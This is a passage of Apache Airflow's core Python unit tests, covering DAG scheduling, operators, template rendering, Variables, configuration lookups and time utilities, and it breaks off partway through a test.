import warnings
from datetime import timedelta
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from tempfile import NamedTemporaryFile
from time import sleep
from typing import Optional
from unittest import mock
import sqlalchemy
from dateutil.relativedelta import relativedelta
from numpy.testing import assert_array_almost_equal
from pendulum import utcnow
from airflow import DAG, configuration, exceptions, jobs, models, settings, utils
from airflow.bin import cli
from airflow.configuration import AirflowConfigException, conf, run_command
from airflow.exceptions import AirflowException
from airflow.executors import SequentialExecutor
from airflow.hooks import hdfs_hook
from airflow.hooks.base_hook import BaseHook
from airflow.hooks.sqlite_hook import SqliteHook
from airflow.models import (
BaseOperator, Connection, DagBag, DagModel, DagRun, Pool, TaskFail, TaskInstance, Variable,
)
from airflow.operators.bash_operator import BashOperator
from airflow.operators.check_operator import CheckOperator, ValueCheckOperator
from airflow.operators.dagrun_operator import TriggerDagRunOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.operators.python_operator import PythonOperator
from airflow.settings import Session
from airflow.utils import timezone
from airflow.utils.dates import days_ago, infer_time_unit, round_time, scale_time_units
from airflow.utils.state import State
from airflow.utils.timezone import datetime
from tests.test_utils.config import conf_vars
DEV_NULL = '/dev/null'
TEST_DAG_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
DEFAULT_DATE = datetime(2015, 1, 1)
DEFAULT_DATE_ISO = DEFAULT_DATE.isoformat()
DEFAULT_DATE_DS = DEFAULT_DATE_ISO[:10]
TEST_DAG_ID = 'unit_tests'
EXAMPLE_DAG_DEFAULT_DATE = days_ago(2)
class OperatorSubclass(BaseOperator):
"""
An operator to test template substitution
"""
template_fields = ['some_templated_field']
def __init__(self, some_templated_field, *args, **kwargs):
super().__init__(*args, **kwargs)
self.some_templated_field = some_templated_field
def execute(self, context):
pass
class TestCore(unittest.TestCase):
TEST_SCHEDULE_WITH_NO_PREVIOUS_RUNS_DAG_ID = TEST_DAG_ID + 'test_schedule_dag_no_previous_runs'
TEST_SCHEDULE_DAG_FAKE_SCHEDULED_PREVIOUS_DAG_ID = \
TEST_DAG_ID + 'test_schedule_dag_fake_scheduled_previous'
TEST_SCHEDULE_DAG_NO_END_DATE_UP_TO_TODAY_ONLY_DAG_ID = \
TEST_DAG_ID + 'test_schedule_dag_no_end_date_up_to_today_only'
TEST_SCHEDULE_ONCE_DAG_ID = TEST_DAG_ID + 'test_schedule_dag_once'
TEST_SCHEDULE_RELATIVEDELTA_DAG_ID = TEST_DAG_ID + 'test_schedule_dag_relativedelta'
TEST_SCHEDULE_START_END_DATES_DAG_ID = TEST_DAG_ID + 'test_schedule_dag_start_end_dates'
default_scheduler_args = {"num_runs": 1}
def setUp(self):
self.dagbag = DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.args = {'owner': 'airflow', 'start_date': DEFAULT_DATE}
self.dag = DAG(TEST_DAG_ID, default_args=self.args)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.run_after_loop = self.dag_bash.get_task('run_after_loop')
self.run_this_last = self.dag_bash.get_task('run_this_last')
def tearDown(self):
if os.environ.get('KUBERNETES_VERSION') is not None:
return
dag_ids_to_clean = [
TEST_DAG_ID,
self.TEST_SCHEDULE_WITH_NO_PREVIOUS_RUNS_DAG_ID,
self.TEST_SCHEDULE_DAG_FAKE_SCHEDULED_PREVIOUS_DAG_ID,
self.TEST_SCHEDULE_DAG_NO_END_DATE_UP_TO_TODAY_ONLY_DAG_ID,
self.TEST_SCHEDULE_ONCE_DAG_ID,
self.TEST_SCHEDULE_RELATIVEDELTA_DAG_ID,
self.TEST_SCHEDULE_START_END_DATES_DAG_ID,
]
session = Session()
session.query(DagRun).filter(
DagRun.dag_id.in_(dag_ids_to_clean)).delete(
synchronize_session=False)
session.query(TaskInstance).filter(
TaskInstance.dag_id.in_(dag_ids_to_clean)).delete(
synchronize_session=False)
session.query(TaskFail).filter(
TaskFail.dag_id.in_(dag_ids_to_clean)).delete(
synchronize_session=False)
session.commit()
session.close()
def test_schedule_dag_no_previous_runs(self):
"""
Tests scheduling a dag with no previous runs
"""
dag = DAG(self.TEST_SCHEDULE_WITH_NO_PREVIOUS_RUNS_DAG_ID)
dag.add_task(BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0),
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
dag.clear()
def test_schedule_dag_relativedelta(self):
"""
Tests scheduling a dag with a relativedelta schedule_interval
"""
delta = relativedelta(hours=+1)
dag = DAG(self.TEST_SCHEDULE_RELATIVEDELTA_DAG_ID,
schedule_interval=delta)
dag.add_task(BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0),
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run2)
self.assertEqual(dag.dag_id, dag_run2.dag_id)
self.assertIsNotNone(dag_run2.run_id)
self.assertNotEqual('', dag_run2.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0) + delta,
dag_run2.execution_date,
msg='dag_run2.execution_date did not match expectation: {0}'
.format(dag_run2.execution_date)
)
self.assertEqual(State.RUNNING, dag_run2.state)
self.assertFalse(dag_run2.external_trigger)
dag.clear()
def test_schedule_dag_fake_scheduled_previous(self):
"""
Test scheduling a dag where there is a prior DagRun
which has the same run_id as the next run should have
"""
delta = timedelta(hours=1)
dag = DAG(self.TEST_SCHEDULE_DAG_FAKE_SCHEDULED_PREVIOUS_DAG_ID,
schedule_interval=delta,
start_date=DEFAULT_DATE)
dag.add_task(BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=DEFAULT_DATE))
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
dag.create_dagrun(run_id=DagRun.id_for_date(DEFAULT_DATE),
execution_date=DEFAULT_DATE,
state=State.SUCCESS,
external_trigger=True)
dag_run = scheduler.create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
DEFAULT_DATE + delta,
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
def test_schedule_dag_once(self):
"""
Tests scheduling a dag scheduled for @once - should be scheduled the first time
it is called, and not scheduled the second.
"""
dag = DAG(self.TEST_SCHEDULE_ONCE_DAG_ID)
dag.schedule_interval = '@once'
dag.add_task(BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertIsNone(dag_run2)
dag.clear()
def test_fractional_seconds(self):
"""
Tests if fractional seconds are stored in the database
"""
dag = DAG(TEST_DAG_ID + 'test_fractional_seconds')
dag.schedule_interval = '@once'
dag.add_task(BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
start_date = timezone.utcnow()
run = dag.create_dagrun(
run_id='test_' + start_date.isoformat(),
execution_date=start_date,
start_date=start_date,
state=State.RUNNING,
external_trigger=False
)
run.refresh_from_db()
self.assertEqual(start_date, run.execution_date,
"dag run execution_date loses precision")
self.assertEqual(start_date, run.start_date,
"dag run start_date loses precision ")
def test_schedule_dag_start_end_dates(self):
"""
Tests that an attempt to schedule a task after the Dag's end_date
does not succeed.
"""
delta = timedelta(hours=1)
runs = 3
start_date = DEFAULT_DATE
end_date = start_date + (runs - 1) * delta
dag = DAG(self.TEST_SCHEDULE_START_END_DATES_DAG_ID,
start_date=start_date,
end_date=end_date,
schedule_interval=delta)
dag.add_task(BaseOperator(task_id='faketastic', owner='Also fake'))
# Create and schedule the dag runs
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for _ in range(runs):
dag_runs.append(scheduler.create_dag_run(dag))
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
def test_schedule_dag_no_end_date_up_to_today_only(self):
"""
Tests that a Dag created without an end_date can only be scheduled up
to and including the current datetime.
For example, if today is 2016-01-01 and we are scheduling from a
start_date of 2015-01-01, only jobs up to, but not including
2016-01-01 should be scheduled.
"""
session = settings.Session()
delta = timedelta(days=1)
now = utcnow()
start_date = now.subtract(weeks=1)
runs = (now - start_date).days
dag = DAG(self.TEST_SCHEDULE_DAG_NO_END_DATE_UP_TO_TODAY_ONLY_DAG_ID,
start_date=start_date,
schedule_interval=delta)
dag.add_task(BaseOperator(task_id='faketastic', owner='Also fake'))
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for _ in range(runs):
dag_run = scheduler.create_dag_run(dag)
dag_runs.append(dag_run)
# Mark the DagRun as complete
dag_run.state = State.SUCCESS
session.merge(dag_run)
session.commit()
# Attempt to schedule an additional dag run (for 2016-01-01)
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
def test_confirm_unittest_mod(self):
self.assertTrue(conf.get('core', 'unit_test_mode'))
def test_pickling(self):
dp = self.dag.pickle()
self.assertEqual(dp.pickle.dag_id, self.dag.dag_id)
def test_rich_comparison_ops(self):
class DAGsubclass(DAG):
pass
dag_eq = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_load_time = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_name = DAG(TEST_DAG_ID + '_neq', default_args=self.args)
dag_subclass = DAGsubclass(TEST_DAG_ID, default_args=self.args)
dag_subclass_diff_name = DAGsubclass(
TEST_DAG_ID + '2', default_args=self.args)
for d in [dag_eq, dag_diff_name, dag_subclass, dag_subclass_diff_name]:
d.last_loaded = self.dag.last_loaded
# test identity equality
self.assertEqual(self.dag, self.dag)
# test dag (in)equality based on _comps
self.assertEqual(dag_eq, self.dag)
self.assertNotEqual(dag_diff_name, self.dag)
self.assertNotEqual(dag_diff_load_time, self.dag)
# test dag inequality based on type even if _comps happen to match
self.assertNotEqual(dag_subclass, self.dag)
# a dag should equal an unpickled version of itself
d = pickle.dumps(self.dag)
self.assertEqual(pickle.loads(d), self.dag)
# dags are ordered based on dag_id no matter what the type is
self.assertLess(self.dag, dag_diff_name)
self.assertGreater(self.dag, dag_diff_load_time)
self.assertLess(self.dag, dag_subclass_diff_name)
# greater than should have been created automatically by functools
self.assertGreater(dag_diff_name, self.dag)
# hashes are non-random and match equality
self.assertEqual(hash(self.dag), hash(self.dag))
self.assertEqual(hash(dag_eq), hash(self.dag))
self.assertNotEqual(hash(dag_diff_name), hash(self.dag))
self.assertNotEqual(hash(dag_subclass), hash(self.dag))
def test_check_operators(self):
conn_id = "sqlite_default"
captainHook = BaseHook.get_hook(conn_id=conn_id)
captainHook.run("CREATE TABLE operator_test_table (a, b)")
captainHook.run("insert into operator_test_table values (1,2)")
t = CheckOperator(
task_id='check',
sql="select count(*) from operator_test_table",
conn_id=conn_id,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
t = ValueCheckOperator(
task_id='value_check',
pass_value=95,
tolerance=0.1,
conn_id=conn_id,
sql="SELECT 100",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
captainHook.run("drop table operator_test_table")
def test_clear_api(self):
task = self.dag_bash.tasks[0]
task.clear(
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE,
upstream=True, downstream=True)
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.are_dependents_done()
def test_illegal_args(self):
"""
Tests that Operators reject illegal arguments
"""
with warnings.catch_warnings(record=True) as w:
BashOperator(
task_id='test_illegal_args',
bash_command='echo success',
dag=self.dag,
illegal_argument_1234='hello?')
self.assertTrue(
issubclass(w[0].category, PendingDeprecationWarning))
self.assertIn(
('Invalid arguments were passed to BashOperator '
'(task_id: test_illegal_args).'),
w[0].message.args[0])
def test_bash_operator(self):
t = BashOperator(
task_id='test_bash_operator',
bash_command="echo success",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_multi_byte_output(self):
t = BashOperator(
task_id='test_multi_byte_bash_operator',
bash_command="echo \u2600",
dag=self.dag,
output_encoding='utf-8')
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_kill(self):
import psutil
sleep_time = "100%d" % os.getpid()
t = BashOperator(
task_id='test_bash_operator_kill',
execution_timeout=timedelta(seconds=1),
bash_command="/bin/bash -c 'sleep %s'" % sleep_time,
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
sleep(2)
pid = -1
for proc in psutil.process_iter():
if proc.cmdline() == ['sleep', sleep_time]:
pid = proc.pid
if pid != -1:
os.kill(pid, signal.SIGTERM)
self.fail("BashOperator's subprocess still running after stopping on timeout!")
def test_on_failure_callback(self):
# Annoying workaround for nonlocal not existing in python 2
data = {'called': False}
def check_failure(context, test_case=self):
data['called'] = True
error = context.get('exception')
test_case.assertIsInstance(error, AirflowException)
t = BashOperator(
task_id='check_on_failure_callback',
bash_command="exit 1",
dag=self.dag,
on_failure_callback=check_failure)
self.assertRaises(
exceptions.AirflowException,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
self.assertTrue(data['called'])
def test_trigger_dagrun(self):
def trigga(_, obj):
if True:
return obj
t = TriggerDagRunOperator(
task_id='test_trigger_dagrun',
trigger_dag_id='example_bash_operator',
python_callable=trigga,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_dryrun(self):
t = BashOperator(
task_id='test_dryrun',
bash_command="echo success",
dag=self.dag)
t.dry_run()
def test_sqlite(self):
import airflow.operators.sqlite_operator
t = airflow.operators.sqlite_operator.SqliteOperator(
task_id='time_sqlite',
sql="CREATE TABLE IF NOT EXISTS unitest (dummy VARCHAR(20))",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_timeout(self):
t = PythonOperator(
task_id='test_timeout',
execution_timeout=timedelta(seconds=1),
python_callable=lambda: sleep(5),
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_python_op(self):
def test_py_op(templates_dict, ds, **kwargs):
if not templates_dict['ds'] == ds:
raise Exception("failure")
t = PythonOperator(
task_id='test_py_op',
python_callable=test_py_op,
templates_dict={'ds': "{{ ds }}"},
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_complex_template(self):
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field['bar'][1],
context['ds'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field={
'foo': '123',
'bar': ['baz', '{{ ds }}']
},
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_variable(self):
"""
Test the availability of variables in templates
"""
val = {
'test_value': 'a test value'
}
Variable.set("a_variable", val['test_value'])
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable(self):
"""
Test the availability of variables (serialized as JSON) in templates
"""
val = {
'test_value': {'foo': 'bar', 'obj': {'v1': 'yes', 'v2': 'no'}}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value']['obj']['v2'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.json.a_variable.obj.v2 }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable_as_value(self):
"""
Test the availability of variables (serialized as JSON) in templates, but
accessed as a value
"""
val = {
'test_value': {'foo': 'bar'}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
'{\n "foo": "bar"\n}')
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_non_bool(self):
"""
Test templates can handle objects with no sense of truthiness
"""
class NonBoolObject:
def __len__(self):
return NotImplemented
def __bool__(self):
return NotImplemented
t = OperatorSubclass(
task_id='test_bad_template_obj',
some_templated_field=NonBoolObject(),
dag=self.dag)
t.resolve_template_files()
def test_task_get_template(self):
TI = TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
context = ti.get_template_context()
# DEFAULT DATE is 2015-01-01
self.assertEqual(context['ds'], '2015-01-01')
self.assertEqual(context['ds_nodash'], '20150101')
# next_ds is 2015-01-02 as the dag interval is daily
self.assertEqual(context['next_ds'], '2015-01-02')
self.assertEqual(context['next_ds_nodash'], '20150102')
# prev_ds is 2014-12-31 as the dag interval is daily
self.assertEqual(context['prev_ds'], '2014-12-31')
self.assertEqual(context['prev_ds_nodash'], '20141231')
self.assertEqual(context['ts'], '2015-01-01T00:00:00+00:00')
self.assertEqual(context['ts_nodash'], '20150101T000000')
self.assertEqual(context['ts_nodash_with_tz'], '20150101T000000+0000')
self.assertEqual(context['yesterday_ds'], '2014-12-31')
self.assertEqual(context['yesterday_ds_nodash'], '20141231')
self.assertEqual(context['tomorrow_ds'], '2015-01-02')
self.assertEqual(context['tomorrow_ds_nodash'], '20150102')
def test_local_task_job(self):
TI = TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(task_instance=ti, ignore_ti_state=True)
job.run()
def test_raw_job(self):
TI = TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
def test_variable_set_get_round_trip(self):
Variable.set("tested_var_set_id", "Monday morning breakfast")
self.assertEqual("Monday morning breakfast", Variable.get("tested_var_set_id"))
def test_variable_set_get_round_trip_json(self):
value = {"a": 17, "b": 47}
Variable.set("tested_var_set_id", value, serialize_json=True)
self.assertEqual(value, Variable.get("tested_var_set_id", deserialize_json=True))
def test_get_non_existing_var_should_return_default(self):
default_value = "some default val"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value))
def test_get_non_existing_var_should_raise_key_error(self):
with self.assertRaises(KeyError):
Variable.get("thisIdDoesNotExist")
def test_get_non_existing_var_with_none_default_should_return_none(self):
self.assertIsNone(Variable.get("thisIdDoesNotExist", default_var=None))
def test_get_non_existing_var_should_not_deserialize_json_default(self):
default_value = "}{ this is a non JSON default }{"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value,
deserialize_json=True))
def test_variable_setdefault_round_trip(self):
key = "tested_var_setdefault_1_id"
value = "Monday morning breakfast in Paris"
Variable.setdefault(key, value)
self.assertEqual(value, Variable.get(key))
def test_variable_setdefault_round_trip_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Happiness": True}
Variable.setdefault(key, value, deserialize_json=True)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_variable_setdefault_existing_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Happiness": True}
Variable.set(key, value, serialize_json=True)
val = Variable.setdefault(key, value, deserialize_json=True)
# Check the returned value, and the stored value are handled correctly.
self.assertEqual(value, val)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_variable_delete(self):
key = "tested_var_delete"
value = "to be deleted"
# No-op if the variable doesn't exist
Variable.delete(key)
with self.assertRaises(KeyError):
Variable.get(key)
# Set the variable
Variable.set(key, value)
self.assertEqual(value, Variable.get(key))
# Delete the variable
Variable.delete(key)
with self.assertRaises(KeyError):
Variable.get(key)
def test_parameterized_config_gen(self):
cfg = configuration.parameterized_config(configuration.DEFAULT_CONFIG)
# making sure some basic building blocks are present:
self.assertIn("[core]", cfg)
self.assertIn("dags_folder", cfg)
self.assertIn("sql_alchemy_conn", cfg)
self.assertIn("fernet_key", cfg)
# making sure replacement actually happened
self.assertNotIn("{AIRFLOW_HOME}", cfg)
self.assertNotIn("{FERNET_KEY}", cfg)
def test_config_use_original_when_original_and_fallback_are_present(self):
self.assertTrue(conf.has_option("core", "FERNET_KEY"))
self.assertFalse(conf.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = conf.get('core', 'FERNET_KEY')
with conf_vars({('core', 'FERNET_KEY_CMD'): 'printf HELLO'}):
FALLBACK_FERNET_KEY = conf.get(
"core",
"FERNET_KEY"
)
self.assertEqual(FERNET_KEY, FALLBACK_FERNET_KEY)
def test_config_throw_error_when_original_and_fallback_is_absent(self):
self.assertTrue(conf.has_option("core", "FERNET_KEY"))
self.assertFalse(conf.has_option("core", "FERNET_KEY_CMD"))
with conf_vars({('core', 'fernet_key'): None}):
with self.assertRaises(AirflowConfigException) as cm:
conf.get("core", "FERNET_KEY")
exception = str(cm.exception)
message = "section/key [core/fernet_key] not found in config"
self.assertEqual(message, exception)
def test_config_override_original_when_non_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = "some value"
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_config_override_original_when_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = ""
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_round_time(self):
rt1 = round_time(datetime(2015, 1, 1, 6), timedelta(days=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt1)
rt2 = round_time(datetime(2015, 1, 2), relativedelta(months=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt2)
rt3 = round_time(datetime(2015, 9, 16, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 16, 0, 0), rt3)
rt4 = round_time(datetime(2015, 9, 15, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 15, 0, 0), rt4)
rt5 = round_time(datetime(2015, 9, 14, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt5)
rt6 = round_time(datetime(2015, 9, 13, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt6)
def test_infer_time_unit(self):
self.assertEqual('minutes', infer_time_unit([130, 5400, 10]))
self.assertEqual('seconds', infer_time_unit([110, 50, 10, 100]))
self.assertEqual('hours', infer_time_unit([100000, 50000, 10000, 20000]))
self.assertEqual('days', infer_time_unit([200000, 100000]))
def test_scale_time_units(self):
# use assert_almost_equal from numpy.testing since we are comparing
# floating point arrays
arr1 = scale_time_units([130, 5400, 10], 'minutes')
assert_array_almost_equal(arr1, [2.167, 90.0, 0.167], decimal=3)
arr2 = scale_time_units([110, 50, 10, 100], 'seconds')
assert_array_almost_equal(arr2, [110.0, 50.0, 10.0, 100.0], decimal=3)
arr3 = scale_time_units([100000, 50000, 10000, 20000], 'hours')
assert_array_almost_equal(arr3, [27.778, 13.889, 2.778, 5.556],
decimal=3)
arr4 = scale_time_units([200000, 100000], 'days')
assert_array_almost_equal(arr4, [2.315, 1.157], decimal=3)
def test_bad_trigger_rule(self):
with self.assertRaises(AirflowException):
DummyOperator(
task_id='test_bad_trigger',
trigger_rule="non_existent",
dag=self.dag)
def test_terminate_task(self):
"""If a task instance's db state get deleted, it should fail"""
TI = TaskInstance
dag = self.dagbag.dags.get('test_utils')
task = dag.task_dict.get('sleeps_forever')
ti = TI(task=task, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(
task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
# Running task instance asynchronously
p = multiprocessing.Process(target=job.run)
p.start()
sleep(5)
settings.engine.dispose()
session = settings.Session()
ti.refresh_from_db(session=session)
# making sure it's actually running
self.assertEqual(State.RUNNING, ti.state)
ti = session.query(TI).filter_by(
dag_id=task.dag_id,
task_id=task.task_id,
execution_date=DEFAULT_DATE
).one()
# deleting the instance should result in a failure
session.delete(ti)
session.commit()
# waiting for the async task to finish
p.join()
# making sure that the task ended up as failed
ti.refresh_from_db(session=session)
self.assertEqual(State.FAILED, ti.state)
session.close()
def test_task_fail_duration(self):
"""If a task fails, the duration should be recorded in TaskFail"""
p = BashOperator(
task_id='pass_sleepy',
bash_command='sleep 3',
dag=self.dag)
f = BashOperator(
task_id='fail_sleepy',
bash_command='sleep 5',
execution_timeout=timedelta(seconds=3),
retry_delay=timedelta(seconds=0),
dag=self.dag)
session = settings.Session()
try:
p.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except Exception:
pass
try:
f.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except Exception:
pass
p_fails = session.query(TaskFail).filter_by(
task_id='pass_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
f_fails = session.query(TaskFail).filter_by(
task_id='fail_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
self.assertEqual(0, len(p_fails))
self.assertEqual(1, len(f_fails))
self.assertGreaterEqual(sum([f.duration for f in f_fails]), 3)
def test_run_command(self):
write = r'sys.stdout.buffer.write("\u1000foo".encode("utf8"))'
cmd = 'import sys; {0}; sys.stdout.flush()'.format(write)
self.assertEqual(run_command("python -c '{0}'".format(cmd)), '\u1000foo')
self.assertEqual(run_command('echo "foo bar"'), 'foo bar\n')
self.assertRaises(AirflowConfigException, run_command, 'bash -c "exit 1"')
def test_trigger_dagrun_with_execution_date(self):
utc_now = timezone.utcnow()
run_id = 'trig__' + utc_now.isoformat()
def payload_generator(context, object): # pylint: disable=unused-argument
object.run_id = run_id
return object
task = TriggerDagRunOperator(task_id='test_trigger_dagrun_with_execution_date',
trigger_dag_id='example_bash_operator',
python_callable=payload_generator,
execution_date=utc_now,
dag=self.dag)
task.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
dag_runs = DagRun.find(dag_id='example_bash_operator', run_id=run_id)
self.assertEqual(len(dag_runs), 1)
dag_run = dag_runs[0]
self.assertEqual(dag_run.execution_date, utc_now)
def test_trigger_dagrun_with_str_execution_date(self):
utc_now_str = timezone.utcnow().isoformat()
self.assertIsInstance(utc_now_str, (str,))
run_id = 'trig__' + utc_now_str
def payload_generator(context, object): # pylint: disable=unused-argument
object.run_id = run_id
return object
task = TriggerDagRunOperator(
task_id='test_trigger_dagrun_with_str_execution_date',
trigger_dag_id='example_bash_operator',
python_callable=payload_generator,
execution_date=utc_now_str,
dag=self.dag)
task.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
dag_runs = DagRun.find(dag_id='example_bash_operator', run_id=run_id)
self.assertEqual(len(dag_runs), 1)
dag_run = dag_runs[0]
self.assertEqual(dag_run.execution_date.isoformat(), utc_now_str)
def test_trigger_dagrun_with_templated_execution_date(self):
task = TriggerDagRunOperator(
task_id='test_trigger_dagrun_with_str_execution_date',
trigger_dag_id='example_bash_operator',
execution_date='{{ execution_date }}',
dag=self.dag)
self.assertTrue(isinstance(task.execution_date, str))
self.assertEqual(task.execution_date, '{{ execution_date }}')
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.render_templates()
self.assertEqual(timezone.parse(task.execution_date), DEFAULT_DATE)
def test_externally_triggered_dagrun(self):
TI = TaskInstance
# Create the dagrun between two "scheduled" execution dates of the DAG
